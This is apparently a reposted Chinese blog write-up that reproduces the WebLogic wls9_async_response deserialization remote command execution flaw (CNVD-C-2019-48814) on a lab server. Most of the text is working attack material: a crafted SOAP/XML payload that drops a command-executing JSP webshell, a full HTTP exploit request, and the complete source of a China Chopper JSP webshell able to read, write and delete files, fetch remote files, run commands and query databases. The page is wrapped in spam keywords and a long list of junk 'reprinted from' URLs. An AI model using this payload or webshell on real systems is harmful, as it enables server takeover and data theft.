怎么注册一个网站,深圳网络公司视频,正规软件开发培训学校,北京网站建设项目漏洞概述#xff1a;
#xff08;CNVD-C-2019-48814#xff09;Weblogic wls9_async_response 反序列化远程命令执行漏洞存在于wls9-async组件中#xff0c;攻击者可以向/_async/AsyncResponseService路径下传入构造好的恶意xml格式的数据#xff0c;传入的数据在服务器端…漏洞概述
CNVD-C-2019-48814Weblogic wls9_async_response 反序列化远程命令执行漏洞存在于wls9-async组件中攻击者可以向/_async/AsyncResponseService路径下传入构造好的恶意xml格式的数据传入的数据在服务器端反序列化时执行其中的恶意代码从而造成远程命令执行。
漏洞环境
服务器:windowsserver2008搭建好weblogic环境。IP192.168.131.157
复现过程
首先访问/_async/AsyncResponseService来判断是否启用该组件。 刷新页面并启用burpsuite抓包拦截/_async/AsyncResponseService数据包发送到repeater修改method为POST修改新增字段的值把context-type修改成text/xml。poc如下 soapenv:Envelope xmlns:soapenvhttp://schemas.xmlsoap.org/soap/envelope/ xmlns:wsahttp://www.w3.org/2005/08/addressing xmlns:asyhttp://www.bea.com/async/AsyncResponseServicesoapenv:Headerwsa:Actionxx/wsa:Actionwsa:RelatesToxx/wsa:RelatesTowork:WorkContext xmlns:workhttp://bea.com/2004/06/soap/workarea/java version1.8.0_131 classjava.beans.xmlDecoderobject classjava.io.PrintWriterstringservers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/webshell.jsp/stringvoid methodprintlnstring![CDATA[%if(123.equals(request.getParameter(pwd))){java.io.InputStream in Runtime.getRuntime().exec(request.getParameter(cmd)).getInputStream();int a -1; byte[] b new byte[1024]; out.print(pre); while((ain.read(b))!-1){out.println(new String(b)); }out.print(/pre);} %]]/string/voidvoid methodclose//object/java/work:WorkContext/soapenv:Headersoapenv:Bodyasy:onAsyncDelivery//soapenv:Body/soapenv:Envelope成功后访问http://192.168.131.157:7001/bea_wls_internal/webshell.jsp?pwd123cmdwhoami 命令成功执行修改cmd的值为systeminfo命令也被执行。
上传一句话木马并连接
poc如下一句话木马为菜刀中jsp格式木马连接密码cmd
POST /_async/AsyncResponseService HTTP/1.1
Host: 192.168.131.157:7001
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtmlxml,application/xml;q0.9,*/*;q0.8
Accept-Language: zh-CN,zh;q0.8,en-US;q0.5,en;q0.3
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age0
Content-Type: text/xml
Content-Length: 9839soapenv:Envelope xmlns:soapenvhttp://schemas.xmlsoap.org/soap/envelope/ xmlns:wsahttp://www.w3.org/2005/08/addressing xmlns:asyhttp://www.bea.com/async/AsyncResponseServicesoapenv:Headerwsa:Actionxx/wsa:Actionwsa:RelatesToxx/wsa:RelatesTowork:WorkContext xmlns:workhttp://bea.com/2004/06/soap/workarea/java version1.8.0_131 classjava.beans.xmlDecoderobject classjava.io.PrintWriterstringservers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/sh.jsp/stringvoid methodprintlnstring![CDATA[%page importjava.io.*,java.util.*,java.net.*,java.sql.*,java.text.*%
%!String Pwd cmd;String cs UTF-8;String EC(String s) throws Exception {return new String(s.getBytes(ISO-8859-1),cs);}Connection GC(String s) throws Exception {String[] x s.trim().split(choraheiheihei);Class.forName(x[0].trim());if(x[1].indexOf(jdbc:oracle)!-1){return DriverManager.getConnection(x[1].trim():x[4],x[2].equalsIgnoreCase([/null])?:x[2],x[3].equalsIgnoreCase([/null])?:x[3]);}else{Connection c DriverManager.getConnection(x[1].trim(),x[2].equalsIgnoreCase([/null])?:x[2],x[3].equalsIgnoreCase([/null])?:x[3]);if (x.length 4) {c.setCatalog(x[4]);}return c;}}void AA(StringBuffer sb) throws Exception {File k new File();File r[] k.listRoots();for (int i 0; i r.length; i) {sb.append(r[i].toString().substring(0, 2));}}void BB(String s, StringBuffer sb) throws Exception {File oF new File(s), l[] oF.listFiles();String sT, sQ, sF ;java.util.Date dt;SimpleDateFormat fm new SimpleDateFormat(yyyy-MM-dd HH:mm:ss);for (int i 0; i l.length; i) {dt new java.util.Date(l[i].lastModified());sT fm.format(dt);sQ l[i].canRead() ? R : ;sQ l[i].canWrite() ? W : ;if (l[i].isDirectory()) {sb.append(l[i].getName() /\t sT \t l[i].length() \t sQ \n);} else {sFl[i].getName() \t sT \t l[i].length() \t sQ \n;}}sb.append(sF);}void EE(String s) throws Exception {File f new File(s);if (f.isDirectory()) {File x[] f.listFiles();for (int k 0; k x.length; k) {if (!x[k].delete()) {EE(x[k].getPath());}}}f.delete();}void FF(String s, HttpServletResponse r) throws Exception {int n;byte[] b new byte[512];r.reset();ServletOutputStream os r.getOutputStream();BufferedInputStream is new BufferedInputStream(new FileInputStream(s));os.write((- |).getBytes(), 0, 3);while ((n is.read(b, 0, 512)) ! -1) {os.write(b, 0, n);}os.write((| -).getBytes(), 0, 3);os.close();is.close();}void GG(String s, String d) throws Exception {String h 0123456789ABCDEF;File f new File(s);f.createNewFile();FileOutputStream os new FileOutputStream(f);for (int i 0; i d.length(); i 2) {os.write((h.indexOf(d.charAt(i)) 4 | h.indexOf(d.charAt(i 1))));}os.close();}void HH(String s, String d) throws Exception {File sf new File(s), df new File(d);if (sf.isDirectory()) {if (!df.exists()) {df.mkdir();}File z[] sf.listFiles();for (int j 0; j z.length; j) {HH(s / z[j].getName(), d / z[j].getName());}} else {FileInputStream is new FileInputStream(sf);FileOutputStream os new FileOutputStream(df);int n;byte[] b new byte[512];while ((n is.read(b, 0, 512)) ! -1) {os.write(b, 0, n);}is.close();os.close();}}void II(String s, String d) throws Exception {File sf new File(s), df new File(d);sf.renameTo(df);}void JJ(String s) throws Exception {File f new File(s);f.mkdir();}void KK(String s, String t) throws Exception {File f new File(s);SimpleDateFormat fm new SimpleDateFormat(yyyy-MM-dd HH:mm:ss);java.util.Date dt fm.parse(t);f.setLastModified(dt.getTime());}void LL(String s, String d) throws Exception {URL u new URL(s);int n 0;FileOutputStream os new FileOutputStream(d);HttpURLConnection h (HttpURLConnection) u.openConnection();InputStream is h.getInputStream();byte[] b new byte[512];while ((n is.read(b)) ! -1) {os.write(b, 0, n);}os.close();is.close();h.disconnect();}void MM(InputStream is, StringBuffer sb) throws Exception {String l;BufferedReader br new BufferedReader(new InputStreamReader(is));while ((l br.readLine()) ! null) {sb.append(l \r\n);}}void NN(String s, StringBuffer sb) throws Exception {Connection c GC(s);ResultSet r s.indexOf(jdbc:oracle)!-1?c.getMetaData().getSchemas():c.getMetaData().getCatalogs();while (r.next()) {sb.append(r.getString(1) \t|\t\r\n);}r.close();c.close();}void OO(String s, StringBuffer sb) throws Exception {Connection c GC(s);String[] x s.trim().split(choraheiheihei);ResultSet r c.getMetaData().getTables(null,s.indexOf(jdbc:oracle)!-1?x.length5?x[5]:x[4]:null, %, new String[]{TABLE});while (r.next()) {sb.append(r.getString(TABLE_NAME) \t|\t\r\n);}r.close();c.close();}void PP(String s, StringBuffer sb) throws Exception {String[] x s.trim().split(\r\n);Connection c GC(s);Statement m c.createStatement(1005, 1007);ResultSet r m.executeQuery(select * from x[x.length-1]);ResultSetMetaData d r.getMetaData();for (int i 1; i d.getColumnCount(); i) {sb.append(d.getColumnName(i) ( d.getColumnTypeName(i) )\t);}r.close();m.close();c.close();}void QQ(String cs, String s, String q, StringBuffer sb,String p) throws Exception {Connection c GC(s);Statement m c.createStatement(1005, 1008);BufferedWriter bw null;try {ResultSet r m.executeQuery(q.indexOf(--f:)!-1?q.substring(0,q.indexOf(--f:)):q);ResultSetMetaData d r.getMetaData();int n d.getColumnCount();for (int i 1; i n; i) {sb.append(d.getColumnName(i) \t|\t);}sb.append(\r\n);if(q.indexOf(--f:)!-1){File file new File(p);if(q.indexOf(-to:)-1){file.mkdir();}bw new BufferedWriter(new OutputStreamWriter(new FileOutputStream(new File(q.indexOf(-to:)!-1?p.trim():pq.substring(q.indexOf(--f:) 4,q.length()).trim()),true),cs));}while (r.next()) {for (int i 1; i n; i) {if(q.indexOf(--f:)!-1){bw.write(r.getObject(i)\t);bw.flush();}else{sb.append(r.getObject(i) \t|\t);}}if(bw!null){bw.newLine();}sb.append(\r\n);}r.close();if(bw!null){bw.close();}} catch (Exception e) {sb.append(Result\t|\t\r\n);try {m.executeUpdate(q);sb.append(Execute Successfully!\t|\t\r\n);} catch (Exception ee) {sb.append(ee.toString() \t|\t\r\n);}}m.close();c.close();}
%
%//String Z EC(request.getParameter(Pwd) , cs);cs request.getParameter(code) ! null ? request.getParameter(code) :cs;request.setCharacterEncoding(cs);response.setContentType(text/html;charset cs);StringBuffer sb new StringBuffer();
if (request.getParameter(Pwd) ! null) {try {String Z EC(request.getParameter(action) );String z1 EC(request.getParameter(z1) );String z2 EC(request.getParameter(z2) );sb.append(- |);String s request.getSession().getServletContext().getRealPath(/);if (Z.equals(A)) {sb.append(s \t);if (!s.substring(0, 1).equals(/)) {AA(sb);}} else if (Z.equals(B)) {BB(z1, sb);} else if (Z.equals(C)) {String l ;BufferedReader br new BufferedReader(new InputStreamReader(new FileInputStream(new File(z1))));while ((l br.readLine()) ! null) {sb.append(l \r\n);}br.close();} else if (Z.equals(D)) {BufferedWriter bw new BufferedWriter(new OutputStreamWriter(new FileOutputStream(new File(z1))));bw.write(z2);bw.close();sb.append(1);} else if (Z.equals(E)) {EE(z1);sb.append(1);} else if (Z.equals(F)) {FF(z1, response);} else if (Z.equals(G)) {GG(z1, z2);sb.append(1);} else if (Z.equals(H)) {HH(z1, z2);sb.append(1);} else if (Z.equals(I)) {II(z1, z2);sb.append(1);} else if (Z.equals(J)) {JJ(z1);sb.append(1);} else if (Z.equals(K)) {KK(z1, z2);sb.append(1);} else if (Z.equals(L)) {LL(z1, z2);sb.append(1);} else if (Z.equals(M)) {String[] c { z1.substring(2), z1.substring(0, 2), z2 };Process p Runtime.getRuntime().exec(c);MM(p.getInputStream(), sb);MM(p.getErrorStream(), sb);} else if (Z.equals(N)) {NN(z1, sb);} else if (Z.equals(O)) {OO(z1, sb);} else if (Z.equals(P)) {PP(z1, sb);} else if (Z.equals(Q)) {QQ(cs, z1, z2, sb,z2.indexOf(-to:)!-1?z2.substring(z2.indexOf(-to:)4,z2.length()):s.replaceAll(\\\\, /)images/);}} catch (Exception e) {sb.append(ERROR :// e.toString());}sb.append(| -);out.print(sb.toString());
}
%
]]/string/voidvoid methodclose//object/java/work:WorkContext/soapenv:Headersoapenv:Bodyasy:onAsyncDelivery//soapenv:Body/soapenv:Envelope 成功连接后并不能打开任何文件夹菜鸡还在努力中。 文章转载自: http://www.morning.hmsong.com.gov.cn.hmsong.com http://www.morning.sgqw.cn.gov.cn.sgqw.cn http://www.morning.jzykw.cn.gov.cn.jzykw.cn http://www.morning.tkjh.cn.gov.cn.tkjh.cn http://www.morning.jbpodhb.cn.gov.cn.jbpodhb.cn http://www.morning.rckdq.cn.gov.cn.rckdq.cn http://www.morning.tbzcl.cn.gov.cn.tbzcl.cn http://www.morning.hxmqb.cn.gov.cn.hxmqb.cn http://www.morning.gwgjl.cn.gov.cn.gwgjl.cn http://www.morning.mwwnz.cn.gov.cn.mwwnz.cn http://www.morning.wbxrl.cn.gov.cn.wbxrl.cn http://www.morning.jbhhj.cn.gov.cn.jbhhj.cn http://www.morning.kyzja.com.gov.cn.kyzja.com http://www.morning.rhgtc.cn.gov.cn.rhgtc.cn http://www.morning.hzqjgas.com.gov.cn.hzqjgas.com http://www.morning.httzf.cn.gov.cn.httzf.cn http://www.morning.tjpmf.cn.gov.cn.tjpmf.cn http://www.morning.zqzhd.cn.gov.cn.zqzhd.cn http://www.morning.fwkq.cn.gov.cn.fwkq.cn http://www.morning.gjmbk.cn.gov.cn.gjmbk.cn http://www.morning.mzjbz.cn.gov.cn.mzjbz.cn http://www.morning.tbstj.cn.gov.cn.tbstj.cn http://www.morning.ntwfr.cn.gov.cn.ntwfr.cn http://www.morning.hhrpy.cn.gov.cn.hhrpy.cn http://www.morning.rgmls.cn.gov.cn.rgmls.cn http://www.morning.rqfnl.cn.gov.cn.rqfnl.cn http://www.morning.gxtbn.cn.gov.cn.gxtbn.cn http://www.morning.lbpqk.cn.gov.cn.lbpqk.cn http://www.morning.mpnff.cn.gov.cn.mpnff.cn http://www.morning.psgbk.cn.gov.cn.psgbk.cn http://www.morning.nrxsl.cn.gov.cn.nrxsl.cn http://www.morning.rxyz.cn.gov.cn.rxyz.cn http://www.morning.ljhnn.cn.gov.cn.ljhnn.cn http://www.morning.mlzyx.cn.gov.cn.mlzyx.cn http://www.morning.kbntl.cn.gov.cn.kbntl.cn http://www.morning.rlbfp.cn.gov.cn.rlbfp.cn http://www.morning.bhjyh.cn.gov.cn.bhjyh.cn http://www.morning.drfcj.cn.gov.cn.drfcj.cn http://www.morning.xhgxd.cn.gov.cn.xhgxd.cn http://www.morning.i-bins.com.gov.cn.i-bins.com http://www.morning.sbncr.cn.gov.cn.sbncr.cn http://www.morning.mjqms.cn.gov.cn.mjqms.cn http://www.morning.qnywy.cn.gov.cn.qnywy.cn http://www.morning.nywrm.cn.gov.cn.nywrm.cn http://www.morning.mnslh.cn.gov.cn.mnslh.cn http://www.morning.sqxr.cn.gov.cn.sqxr.cn http://www.morning.tddrh.cn.gov.cn.tddrh.cn http://www.morning.wwklf.cn.gov.cn.wwklf.cn http://www.morning.yzxlkj.com.gov.cn.yzxlkj.com http://www.morning.rgmls.cn.gov.cn.rgmls.cn http://www.morning.pqypt.cn.gov.cn.pqypt.cn http://www.morning.yldgw.cn.gov.cn.yldgw.cn http://www.morning.xmhpq.cn.gov.cn.xmhpq.cn http://www.morning.hxsdh.cn.gov.cn.hxsdh.cn http://www.morning.wcqkp.cn.gov.cn.wcqkp.cn http://www.morning.rjrh.cn.gov.cn.rjrh.cn http://www.morning.hxycm.cn.gov.cn.hxycm.cn http://www.morning.rpth.cn.gov.cn.rpth.cn http://www.morning.rbxsk.cn.gov.cn.rbxsk.cn http://www.morning.nzsdr.cn.gov.cn.nzsdr.cn http://www.morning.lywcd.cn.gov.cn.lywcd.cn http://www.morning.fdrb.cn.gov.cn.fdrb.cn http://www.morning.bhrkx.cn.gov.cn.bhrkx.cn http://www.morning.dwgcx.cn.gov.cn.dwgcx.cn http://www.morning.lgsqy.cn.gov.cn.lgsqy.cn http://www.morning.mtxrq.cn.gov.cn.mtxrq.cn http://www.morning.jspnx.cn.gov.cn.jspnx.cn http://www.morning.rbmm.cn.gov.cn.rbmm.cn http://www.morning.zztkt.cn.gov.cn.zztkt.cn http://www.morning.rkjz.cn.gov.cn.rkjz.cn http://www.morning.tyrlk.cn.gov.cn.tyrlk.cn http://www.morning.trfrl.cn.gov.cn.trfrl.cn http://www.morning.glncb.cn.gov.cn.glncb.cn http://www.morning.zlgr.cn.gov.cn.zlgr.cn http://www.morning.hhmfp.cn.gov.cn.hhmfp.cn http://www.morning.bmmhs.cn.gov.cn.bmmhs.cn http://www.morning.wqtzs.cn.gov.cn.wqtzs.cn http://www.morning.xkwrb.cn.gov.cn.xkwrb.cn http://www.morning.gqtzb.cn.gov.cn.gqtzb.cn http://www.morning.bpmfr.cn.gov.cn.bpmfr.cn
